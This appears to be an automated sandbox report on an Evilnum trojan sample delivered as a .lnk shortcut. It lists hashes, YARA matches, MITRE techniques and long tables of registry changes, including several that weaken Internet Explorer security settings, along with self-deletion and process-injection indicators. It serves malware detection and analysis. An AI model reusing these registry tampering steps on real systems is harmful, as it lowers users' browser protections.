evilnum | 0713c5c3db572d88b08d527533cb07d25d33c1c7535cf59075e693b4fefba1fc

Analysis

max time kernel
149s
max time network
142s
platform
windows7_x64
resource
win7-en-20211208
submitted
04/02/2022, 08:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0713c5c3db572d88b08d527533cb07d25d33c1c7535cf59075e693b4fefba1fc.lnk
Size

33KB
MD5

219dedb53da6b1dce0d6c071af59b45c
SHA1

650deb9baff4b7564146222deb555e77d5cbbe36
SHA256

0713c5c3db572d88b08d527533cb07d25d33c1c7535cf59075e693b4fefba1fc
SHA512

dfb89f58f70aa56b7dc681d01626f59c76c2d1bfa777f49b0ec0885c8122fe48e8fd88a92bc5879643b10a17ee709946871004f88187b6e56cca39be915c2e0a

Score

10^/10

evilnum trojan

Malware Config

Signatures

EvilNum C# Component 2 IoCs

resource	yara_rule
behavioral1/files/0x00080000000121fb-56.dat	evilnum_csharp
behavioral1/files/0x0007000000012220-58.dat	evilnum_csharp

EvilNum JS Component 2 IoCs

resource	yara_rule
behavioral1/files/0x00080000000121fb-56.dat	evilnum_js
behavioral1/files/0x0007000000012220-58.dat	evilnum_js

Evilnum
A malware family with multiple components distributed through LNK files.
trojan evilnum

Deletes itself 1 IoCs

pid	Process
1708	cscript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer Automatic Crash Recovery 1 TTPs 1 IoCs

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\AutoRecover = "2"	reg.exe

Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\PhishingFilter	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\PhishingFilter\EnabledV9 = "1"	reg.exe

Modifies Internet Explorer Protected Mode 1 TTPs 1 IoCs

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3"	reg.exe

Modifies Internet Explorer Protected Mode Banner 1 TTPs 1 IoCs

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1"	reg.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	EXCEL.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff19000000190000009f0400007e020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\GPU\SubSysId = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow = "395178327"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\GPU\Revision = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\GPU\VendorId = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\GPU\Wow64-VendorId = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\GPU\Wow64-VersionLow = "0"	iexplore.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3200000032000000b804000097020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "350733535"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\GPU\Wow64-DXFeatureLevel = "0"	iexplore.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListLastUpdateTime = "3691233"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh = "268435456"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff6400000019000000ea0400007e020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\BrowserEmulation	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\GPU\Wow64-DeviceId = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{96D26090-85A0-11EC-A514-46595837F587} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f302f7a020b975438ea1f1f995ba9783000000000200000000001066000000010000200000005c3993b0e57c5184f0a02dc6aba40c9ddcd8bdeafd488cf001ab0349606811be000000000e8000000002000020000000d6dde1a802e2c2c227df79c5ef71883196c45cb70103eaf35e82f0e57eca0d219000000069d905f745d6a7797b26cfdad921f5b5f94e5f70a3b9430573fbdca870a22e476b629fefdaaf1ce48afab60089effc8e3d151126648f69af132717cd7a6879771b7865a310bb96ed315e1de66c6be0cae315a471e2fb9b80f3007750354ab4a4344bab929f1616a922973eb2ac25e5b4f6acd0d6033790a1f4821cc29c178325b8fdc6dedb1444b265cc7d890e72a13940000000e9d96f9fd9c0c3f3c6fdb846a97c344195525383efdc7ebb0db3976a7ff6597b865be0d39db685fa95622c65d4a326d64479dc51ebfaf843a8536be8d2a04691	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\IE10RunOncePerInstallCompleted = "1"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f302f7a020b975438ea1f1f995ba978300000000020000000000106600000001000020000000f07c26db30c67e7029eda741a7bcba97d5deda0bd39ed7982f70d54efdf96772000000000e800000000200002000000032135f10cd89485f88c2e33180cec7d54da2b2ed26014b4a0346934164c9c1cf20000000b42b3659dac7229f00eb892218830ecb51240e76f0233f882c099bef9d75bed340000000022561e4506889b93d73f696787673c2af704e5c91fe608101642d031b317f316c8c684f5a6eaf53d5c253429983dc016523c813d207971748da204c397c1195	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "395178327"	iexplore.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\""	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1800	EXCEL.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
1800	EXCEL.EXE

Suspicious use of FindShellTrayWindow 22 IoCs

pid	Process
1800	EXCEL.EXE
808	iexplore.exe
1800	EXCEL.EXE
808	iexplore.exe
808	iexplore.exe
808	iexplore.exe
808	iexplore.exe
808	iexplore.exe
808	iexplore.exe
808	iexplore.exe
808	iexplore.exe
808	iexplore.exe
808	iexplore.exe
808	iexplore.exe
808	iexplore.exe
808	iexplore.exe
808	iexplore.exe
808	iexplore.exe
808	iexplore.exe
808	iexplore.exe
808	iexplore.exe
808	iexplore.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
808	iexplore.exe
808	iexplore.exe
1800	EXCEL.EXE
1800	EXCEL.EXE
1800	EXCEL.EXE
2024	IEXPLORE.EXE
2024	IEXPLORE.EXE
808	iexplore.exe
808	iexplore.exe
720	IEXPLORE.EXE
720	IEXPLORE.EXE
808	iexplore.exe
808	iexplore.exe
2024	IEXPLORE.EXE
2024	IEXPLORE.EXE
808	iexplore.exe
808	iexplore.exe
2024	IEXPLORE.EXE
2024	IEXPLORE.EXE
808	iexplore.exe
808	iexplore.exe
2024	IEXPLORE.EXE
2024	IEXPLORE.EXE
808	iexplore.exe
808	iexplore.exe
2024	IEXPLORE.EXE
2024	IEXPLORE.EXE
808	iexplore.exe
808	iexplore.exe
2024	IEXPLORE.EXE
2024	IEXPLORE.EXE
808	iexplore.exe
808	iexplore.exe
2024	IEXPLORE.EXE
2024	IEXPLORE.EXE
808	iexplore.exe
808	iexplore.exe
2024	IEXPLORE.EXE
2024	IEXPLORE.EXE
808	iexplore.exe
808	iexplore.exe
2024	IEXPLORE.EXE
2024	IEXPLORE.EXE
808	iexplore.exe
808	iexplore.exe
2024	IEXPLORE.EXE
2024	IEXPLORE.EXE
808	iexplore.exe
808	iexplore.exe
2024	IEXPLORE.EXE
2024	IEXPLORE.EXE
808	iexplore.exe
808	iexplore.exe
720	IEXPLORE.EXE
720	IEXPLORE.EXE
808	iexplore.exe
808	iexplore.exe
2024	IEXPLORE.EXE
2024	IEXPLORE.EXE
808	iexplore.exe
808	iexplore.exe
2024	IEXPLORE.EXE
2024	IEXPLORE.EXE
808	iexplore.exe

Suspicious use of WriteProcessMemory 47 IoCs

description	pid	Process	procid_target
PID 2044 wrote to memory of 1552	2044	cmd.exe	28
PID 2044 wrote to memory of 1552	2044	cmd.exe	28
PID 2044 wrote to memory of 1552	2044	cmd.exe	28
PID 1552 wrote to memory of 1532	1552	cmd.exe	29
PID 1552 wrote to memory of 1532	1552	cmd.exe	29
PID 1552 wrote to memory of 1532	1552	cmd.exe	29
PID 1552 wrote to memory of 1576	1552	cmd.exe	30
PID 1552 wrote to memory of 1576	1552	cmd.exe	30
PID 1552 wrote to memory of 1576	1552	cmd.exe	30
PID 1552 wrote to memory of 1264	1552	cmd.exe	31
PID 1552 wrote to memory of 1264	1552	cmd.exe	31
PID 1552 wrote to memory of 1264	1552	cmd.exe	31
PID 1552 wrote to memory of 1360	1552	cmd.exe	32
PID 1552 wrote to memory of 1360	1552	cmd.exe	32
PID 1552 wrote to memory of 1360	1552	cmd.exe	32
PID 1552 wrote to memory of 1708	1552	cmd.exe	33
PID 1552 wrote to memory of 1708	1552	cmd.exe	33
PID 1552 wrote to memory of 1708	1552	cmd.exe	33
PID 1708 wrote to memory of 968	1708	cscript.exe	35
PID 1708 wrote to memory of 968	1708	cscript.exe	35
PID 1708 wrote to memory of 968	1708	cscript.exe	35
PID 1708 wrote to memory of 564	1708	cscript.exe	37
PID 1708 wrote to memory of 564	1708	cscript.exe	37
PID 1708 wrote to memory of 564	1708	cscript.exe	37
PID 564 wrote to memory of 1164	564	cscript.exe	39
PID 564 wrote to memory of 1164	564	cscript.exe	39
PID 564 wrote to memory of 1164	564	cscript.exe	39
PID 564 wrote to memory of 1260	564	cscript.exe	41
PID 564 wrote to memory of 1260	564	cscript.exe	41
PID 564 wrote to memory of 1260	564	cscript.exe	41
PID 968 wrote to memory of 1800	968	cmd.exe	44
PID 968 wrote to memory of 1800	968	cmd.exe	44
PID 968 wrote to memory of 1800	968	cmd.exe	44
